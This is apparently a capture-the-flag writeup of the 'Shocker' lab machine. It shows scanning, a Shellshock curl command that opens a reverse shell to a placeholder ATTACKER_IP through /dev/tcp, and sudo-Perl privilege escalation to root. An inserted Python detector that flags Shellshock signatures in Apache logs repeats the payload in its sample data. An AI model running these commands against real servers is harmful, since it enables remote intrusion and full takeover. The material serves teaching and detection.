In this writeup, we're going to capture the flags of the easy Linux machine named "Shocker". We will go through the steps needed to get the user flag and then the root flag.
1. Nmap result:
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
After that, we will try to brute-force directories on the website using the dirsearch command:
$ dirsearch -u http://10.129.181.123
[06:00:18] 403 - 297B - /cgi-bin/
[06:01:37] 403 - 302B - /server-status
And here we have a cgi-bin/ sub-directory. It is interesting because we can exploit the Shellshock attack if there is a user.sh file inside.
To understand more about the Shellshock attack, please watch this very useful explanation.
2. Exploiting the Shellshock attack and getting the user flag
First, let's start a listener:
$ nc -lnvp 444
Secondly, we will trigger a reverse shell through the CGI script and then capture our first flag.
$ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/ATTACKER_IP/444 0>&1' http://MACHINE_IP/cgi-bin/user.sh
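Because the CGI gateway exports every request header to the script as an environment variable, the telltale `() {` prefix can be spotted in the web server's logs no matter which header carried it (Cookie here, but User-Agent or Referer work the same way). The following detector is an added example, not part of the original writeup: it parses constructed Apache access-log lines, assuming a LogFormat that appends a quoted `%{Cookie}i` field to the combined format (stock combined format does not log cookies), and reports each request whose header value starts with a bash function definition, noting whether the target sat under /cgi-bin/. ATTACKER_IP is the same placeholder the writeup uses.

```python
import re
from typing import Dict, List

# Constructed access-log lines for illustration (not from the original writeup).
# Format: combined log format plus one trailing quoted field for the Cookie header.
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2021:06:00:18 +0000] "GET /cgi-bin/ HTTP/1.1" 403 297 "-" "Mozilla/5.0" "-"',
    '10.10.14.5 - - [01/Jan/2021:06:05:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.68.0" '
    '"() { :;}; /bin/bash -i >& /dev/tcp/ATTACKER_IP/444 0>&1"',
    '10.10.14.9 - - [01/Jan/2021:06:06:30 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" '
    '"() { :; }; echo Shellshock-probe" "-"',
    '10.10.14.9 - - [01/Jan/2021:06:07:44 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0" "session=abc123"',
]

# Combined format with an extra quoted Cookie field at the end of the line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# Shellshock signature: a header value that begins with a bash function definition.
# A vulnerable bash importing such an environment variable runs what follows the brace.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per request whose Referer, User-Agent or Cookie carries the pattern."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        for field in ("referer", "ua", "cookie"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "header": field,
                    "cgi": m.group("path").startswith("/cgi-bin/"),
                    "status": int(m.group("status")),
                })
                break  # one record per request is enough
    return hits


if __name__ == "__main__":
    print(find_shellshock_attempts(SAMPLE_LOG))
```

A 200 status on a flagged /cgi-bin/ request means the script executed with the crafted header present, which is the case worth investigating first; the 403 probe of /cgi-bin/ itself carries no payload and is not flagged.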
Great, now let's move forward and get our root flag.
3. Privilege escalation and root flag
The first thing to run before anything else is:
$ sudo -l
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
Piece of cake: we're going to use the GTFOBins Perl sudo escalation command:
$ sudo perl -e 'exec "/bin/sh";'
Great, now we can get the root flag easily.
I hope everything was clear. In this writeup we managed to exploit this machine with no trouble, and I hope you learned about the Shellshock attack.
If you have any question or suggestion to add to this article, please feel free to contact me here.